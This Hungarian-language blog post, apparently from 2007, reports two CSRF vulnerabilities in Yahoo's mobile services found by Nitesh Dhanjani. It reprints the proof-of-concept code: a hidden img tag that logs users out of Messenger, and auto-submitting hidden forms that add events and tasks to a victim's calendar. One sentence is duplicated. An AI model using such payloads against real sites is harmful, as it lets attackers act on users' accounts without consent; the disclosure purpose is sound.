A vihar csendesedni látszik a Google körül, de a szél a felhőket a Yahoo felé sodorja: Nitesh Dhanjani két CSRF támadást mutatott be a Yahoo ellen. A kihasznált hibák nem a fő webes alkalmazásokat, hanem a mobil eszközökre szánt WAP és mobil web szolgáltatásokat érintik (mint anno a Freemailnél - ha emlékszik rá egyáltalán valaki ;), de a támadások weben kereszül is kivitelezhetők.
Az első, kevésbé súlyos hiba a Yahoo Instant Messengert érinti. Az alábbi kódot tartalmazó weboldalt meglátogató felhasználót kilépteti a rendszer:
Az első, kevésbé súlyos hiba a Yahoo Instant Messengert érinti. Az alábbi kódot tartalmazó weboldalt meglátogató felhasználót kilépteti a rendszer:
<img src="http://us.m.yahoo.com/p/messenger?tsrc=rawfront" height="0" width="0"/>
A második, jóval súlyosabb hiba a Naptár szolgáltatást érinti, az alábbi kód segítségével tetszőleges bejegyzést adhatunk vagy törölhetünk az aktív Yahoo sessionnel rendelkező naptárjához/ból:
<form name="csrfevent" action="http://wap.oa.yahoo.com/raw?dp=cale&ae=y&v=6&i=0&t=1111111111" method="post" target="hidden">
<input type="hidden" name="ySiD" value="" />
<input type="hidden" name="tt" value="XSRF Demonstration event" />
<input type="hidden" name="mdy" value="10%2F10%2F2007" />
<input type="hidden" name="hm" value="01%3A00" />
<input type="hidden" name="ap" value="pm" />
<input type="hidden" name="dh" value="12" />
<input type="hidden" name="dm" value="45" />
<input type="hidden" name="sh" value="0" />
<input type="hidden" name="dd" value="Yahoo XSRF demonstration event" />
<input type="hidden" name="Save" value="Save" />
</form>
<form name="csrftask" action="http://wap.oa.yahoo.com/raw?dp=cale&v=34&v=6&i=0&t=1111111111" method="post" target="hidden">
<input type="hidden" name="ySiD" value="" />
<input type="hidden" name="todo" value="y" />
<input type="hidden" name="srt" value="y" />
<input type="hidden" name="tt" value="XSRF demonstration task" />
<input type="hidden" name="mdy" value="10%2F10%2F2007" />
<input type="hidden" name="pri" value="1" />
<input type="hidden" name="sh" value="0" />
<input type="hidden" name="dd" value="Yahoo XSRF demonstration task" />
<input type="hidden" name="Save" value="Save" />
<input type="hidden" name="golink" value="v%3D" />
</form>
<script>document.csrfevent.submit();</script>
<script>document.csrftask.submit();</script>
A hiba remek lehetőséget nyújt az adathalászoknak, spammereknek, illetve más típusú csalóknak. Dhanjani értesítette a Yahoot a dologról, reméljük mielőbb megszületik a javítás!